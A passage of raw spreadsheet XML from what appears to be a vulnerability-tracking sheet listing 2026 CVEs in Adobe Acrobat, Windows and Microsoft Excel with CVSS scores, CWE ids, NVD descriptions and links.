r="C633" s="5" t="inlineStr"><is><t>CVE-2026-79907</t></is></c><c r="D633" s="5" t="n"><v>7.8</v></c><c r="E633" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F633" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G633" s="5" t="inlineStr" /><c r="H633" s="5" t="n"><v>0.002</v></c><c r="I633" s="5" t="inlineStr" /><c r="J633" s="5" t="inlineStr" /><c r="K633" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L633" s="5" t="inlineStr" /><c r="M633" s="5" t="inlineStr" /><c r="N633" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P633" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q633" s="5" t="inlineStr" /><c r="R633" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S633" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t></is></c></row><row r="634"><c r="A634" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C634" s="5" t="inlineStr"><is><t>CVE-2026-79908</t></is></c><c r="D634" s="5" t="n"><v>7.8</v></c><c r="E634" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F634" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G634" s="5" t="inlineStr" /><c r="H634" s="5" t="n"><v>0.002</v></c><c r="I634" s="5" t="inlineStr" /><c r="J634" s="5" t="inlineStr" /><c r="K634" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L634" s="5" t="inlineStr" /><c r="M634" s="5" t="inlineStr" /><c r="N634" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P634" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q634" s="5" t="inlineStr" /><c r="R634" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S634" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t></is></c></row><row r="635"><c r="A635" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C635" s="5" t="inlineStr"><is><t>CVE-2026-79909</t></is></c><c r="D635" s="5" t="n"><v>7.8</v></c><c r="E635" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F635" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G635" s="5" t="inlineStr" /><c r="H635" s="5" t="n"><v>0.002</v></c><c r="I635" s="5" t="inlineStr" /><c r="J635" s="5" t="inlineStr" /><c r="K635" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L635" s="5" t="inlineStr" /><c r="M635" s="5" t="inlineStr" /><c r="N635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P635" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q635" s="5" t="inlineStr" /><c r="R635" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S635" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t></is></c></row><row r="636"><c r="A636" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C636" s="5" t="inlineStr"><is><t>CVE-2026-80075</t></is></c><c r="D636" s="5" t="n"><v>7.8</v></c><c r="E636" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F636" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G636" s="5" t="inlineStr" /><c r="H636" s="5" t="n"><v>0.003</v></c><c r="I636" s="5" t="inlineStr" /><c r="J636" s="5" t="inlineStr" /><c r="K636" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L636" s="5" t="inlineStr" /><c r="M636" s="5" t="inlineStr" /><c r="N636" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P636" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q636" s="5" t="inlineStr" /><c r="R636" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S636" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t></is></c></row><row r="637"><c r="A637" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C637" s="5" t="inlineStr"><is><t>CVE-2026-80161</t></is></c><c r="D637" s="5" t="n"><v>7.8</v></c><c r="E637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F637" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G637" s="5" t="inlineStr" /><c r="H637" s="5" t="n"><v>0.002</v></c><c r="I637" s="5" t="inlineStr" /><c r="J637" s="5" t="inlineStr" /><c r="K637" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L637" s="5" t="inlineStr" /><c r="M637" s="5" t="inlineStr" /><c r="N637" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P637" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q637" s="5" t="inlineStr" /><c r="R637" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S637" s="5" t="inlineStr"><is><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is></c><c r="T637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t></is></c></row><row r="638"><c r="A638" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C638" s="5" t="inlineStr"><is><t>CVE-2026-81353</t></is></c><c r="D638" s="5" t="n"><v>7.8</v></c><c r="E638" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F638" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G638" s="5" t="inlineStr" /><c r="H638" s="5" t="n"><v>0.004</v></c><c r="I638" s="5" t="inlineStr" /><c r="J638" s="5" t="inlineStr" /><c r="K638" s="5" t="inlineStr" /><c r="L638" s="5" t="inlineStr" /><c r="M638" s="5" t="inlineStr" /><c r="N638" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P638" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q638" s="5" t="inlineStr" /><c r="R638" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S638" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t></is></c></row><row r="639"><c r="A639" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C639" s="5" t="inlineStr"><is><t>CVE-2026-81386</t></is></c><c r="D639" s="5" t="n"><v>7.8</v></c><c r="E639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F639" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G639" s="5" t="inlineStr" /><c r="H639" s="5" t="n"><v>0.003</v></c><c r="I639" s="5" t="inlineStr" /><c r="J639" s="5" t="inlineStr" /><c r="K639" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L639" s="5" t="inlineStr" /><c r="M639" s="5" t="inlineStr" /><c r="N639" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P639" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q639" s="5" t="inlineStr" /><c r="R639" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S639" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t></is></c></row><row r="640"><c r="A640" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C640" s="5" t="inlineStr"><is><t>CVE-2026-81388</t></is></c><c r="D640" s="5" t="n"><v>7.8</v></c><c r="E640" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F640" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G640" s="5" t="inlineStr" /><c r="H640" s="5" t="n"><v>0.004</v></c><c r="I640" s="5" t="inlineStr" /><c r="J640" s="5" t="inlineStr" /><c r="K640" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L640" s="5" t="inlineStr" /><c r="M640" s="5" t="inlineStr" /><c r="N640" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P640" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q640" s="5" t="inlineStr" /><c r="R640" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S640" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t></is></c></row><row r="641"><c r="A641" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C641" s="5" t="inlineStr"><is><t>CVE-2026-81396</t></is></c><c r="D641" s="5" t="n"><v>7.8</v></c><c r="E641" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F641" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G641" s="5" t="inlineStr" /><c r="H641" s="5" t="n"><v>0.004</v></c><c r="I641" s="5" t="inlineStr" /><c r="J641" s="5" t="inlineStr" /><c r="K641" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L641" s="5" t="inlineStr" /><c r="M641" s="5" t="inlineStr" /><c r="N641" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P641" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q641" s="5" t="inlineStr" /><c r="R641" s="5" t="inlineStr"><is><t>CWE-121, CWE-193</t></is></c><c r="S641" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t></is></c></row><row r="642"><c r="A642" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C642" s="5" t="inlineStr"><is><t>CVE-2026-81397</t></is></c><c r="D642" s="5" t="n"><v>7.8</v></c><c r="E642" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F642" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G642" s="5" t="inlineStr" /><c r="H642" s="5" t="n"><v>0.004</v></c><c r="I642" s="5" t="inlineStr" /><c r="J642" s="5" t="inlineStr" /><c r="K642" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L642" s="5" t="inlineStr" /><c r="M642" s="5" t="inlineStr" /><c r="N642" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P642" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q642" s="5" t="inlineStr" /><c r="R642" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S642" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t></is></c></row><row r="643"><c r="A643" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C643" s="5" t="inlineStr"><is><t>CVE-2026-81398</t></is></c><c r="D643" s="5" t="n"><v>7.8</v></c><c r="E643" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F643" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G643" s="5" t="inlineStr" /><c r="H643" s="5" t="n"><v>0.003</v></c><c r="I643" s="5" t="inlineStr" /><c r="J643" s="5" t="inlineStr" /><c r="K643" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L643" s="5" t="inlineStr" /><c r="M643" s="5" t="inlineStr" /><c r="N643" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P643" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q643" s="5" t="inlineStr" /><c r="R643" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S643" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t></is></c></row><row r="644"><c r="A644" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C644" s="5" t="inlineStr"><is><t>CVE-2026-81947</t></is></c><c r="D644" s="5" t="n"><v>7.8</v></c><c r="E644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F644" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G644" s="5" t="inlineStr" /><c r="H644" s="5" t="n"><v>0.003</v></c><c r="I644" s="5" t="inlineStr" /><c r="J644" s="5" t="inlineStr" /><c r="K644" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L644" s="5" t="inlineStr" /><c r="M644" s="5" t="inlineStr" /><c r="N644" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P644" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q644" s="5" t="inlineStr" /><c r="R644" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S644" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t></is></c></row><row r="645"><c r="A645" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C645" s="5" t="inlineStr"><is><t>CVE-2026-81948</t></is></c><c r="D645" s="5" t="n"><v>7.8</v></c><c r="E645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F645" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G645" s="5" t="inlineStr" /><c r="H645" s="5" t="n"><v>0.004</v></c><c r="I645" s="5" t="inlineStr" /><c r="J645" s="5" t="inlineStr" /><c r="K645" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L645" s="5" t="inlineStr" /><c r="M645" s="5" t="inlineStr" /><c r="N645" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P645" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q645" s="5" t="inlineStr" /><c r="R645" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S645" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t></is></c></row><row r="646"><c r="A646" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C646" s="5" t="inlineStr"><is><t>CVE-2026-81949</t></is></c><c r="D646" s="5" t="n"><v>7.8</v></c><c r="E646" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F646" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G646" s="5" t="inlineStr" /><c r="H646" s="5" t="n"><v>0.004</v></c><c r="I646" s="5" t="inlineStr" /><c r="J646" s="5" t="inlineStr" /><c r="K646" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L646" s="5" t="inlineStr" /><c r="M646" s="5" t="inlineStr" /><c r="N646" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P646" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q646" s="5" t="inlineStr" /><c r="R646" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S646" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t></is></c></row><row r="647"><c r="A647" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C647" s="5" t="inlineStr"><is><t>CVE-2026-81950</t></is></c><c r="D647" s="5" t="n"><v>7.8</v></c><c r="E647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F647" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G647" s="5" t="inlineStr" /><c r="H647" s="5" t="n"><v>0.004</v></c><c r="I647" s="5" t="inlineStr" /><c r="J647" s="5" t="inlineStr" /><c r="K647" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L647" s="5" t="inlineStr" /><c r="M647" s="5" t="inlineStr" /><c r="N647" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P647" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q647" s="5" t="inlineStr" /><c r="R647" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S647" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t></is></c></row><row r="648"><c r="A648" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C648" s="5" t="inlineStr"><is><t>CVE-2026-81951</t></is></c><c r="D648" s="5" t="n"><v>7.8</v></c><c r="E648" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F648" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G648" s="5" t="inlineStr" /><c r="H648" s="5" t="n"><v>0.004</v></c><c r="I648" s="5" t="inlineStr" /><c r="J648" s="5" t="inlineStr" /><c r="K648" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L648" s="5" t="inlineStr" /><c r="M648" s="5" t="inlineStr" /><c r="N648" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P648" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q648" s="5" t="inlineStr" /><c r="R648" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S648" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t></is></c></row><row r="649"><c r="A649" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C649" s="5" t="inlineStr"><is><t>CVE-2026-81953</t></is></c><c r="D649" s="5" t="n"><v>7.8</v></c><c r="E649" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F649" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G649" s="5" t="inlineStr" /><c r="H649" s="5" t="n"><v>0.004</v></c><c r="I649" s="5" t="inlineStr" /><c r="J649" s="5" t="inlineStr" /><c r="K649" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L649" s="5" t="inlineStr" /><c r="M649" s="5" t="inlineStr" /><c r="N649" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P649" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q649" s="5" t="inlineStr" /><c r="R649" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S649" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t></is></c></row><row r="650"><c r="A650" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C650" s="5" t="inlineStr"><is><t>CVE-2026-81954</t></is></c><c r="D650" s="5" t="n"><v>7.8</v></c><c r="E650" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F650" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G650" s="5" t="inlineStr" /><c r="H650" s="5" t="n"><v>0.003</v></c><c r="I650" s="5" t="inlineStr" /><c r="J650" s="5" t="inlineStr" /><c r="K650" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L650" s="5" t="inlineStr" /><c r="M650" s="5" t="inlineStr" /><c r="N650" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P650" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q650" s="5" t="inlineStr" /><c r="R650" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S650" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t></is></c></row><row r="651"><c r="A651" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C651" s="5" t="inlineStr"><is><t>CVE-2026-81956</t></is></c><c r="D651" s="5" t="n"><v>7.8</v></c><c r="E651" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F651" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G651" s="5" t="inlineStr" /><c r="H651" s="5" t="n"><v>0.004</v></c><c r="I651" s="5" t="inlineStr" /><c r="J651" s="5" t="inlineStr" /><c r="K651" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L651" s="5" t="inlineStr" /><c r="M651" s="5" t="inlineStr" /><c r="N651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P651" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q651" s="5" t="inlineStr" /><c r="R651" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S651" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t></is></c></row><row r="652"><c r="A652" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C652" s="5" t="inlineStr"><is><t>CVE-2026-81957</t></is></c><c r="D652" s="5" t="n"><v>7.8</v></c><c r="E652" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F652" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G652" s="5" t="inlineStr" /><c r="H652" s="5" t="n"><v>0.004</v></c><c r="I652" s="5" t="inlineStr" /><c r="J652" s="5" t="inlineStr" /><c r="K652" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L652" s="5" t="inlineStr" /><c r="M652" s="5" t="inlineStr" /><c r="N652" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P652" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q652" s="5" t="inlineStr" /><c r="R652" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S652" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t></is></c></row><row r="653"><c r="A653" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C653" s="5" t="inlineStr"><is><t>CVE-2026-81959</t></is></c><c r="D653" s="5" t="n"><v>7.8</v></c><c r="E653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F653" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G653" s="5" t="inlineStr" /><c r="H653" s="5" t="n"><v>0.004</v></c><c r="I653" s="5" t="inlineStr" /><c r="J653" s="5" t="inlineStr" /><c r="K653" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L653" s="5" t="inlineStr" /><c r="M653" s="5" t="inlineStr" /><c r="N653" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P653" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q653" s="5" t="inlineStr" /><c r="R653" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S653" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an 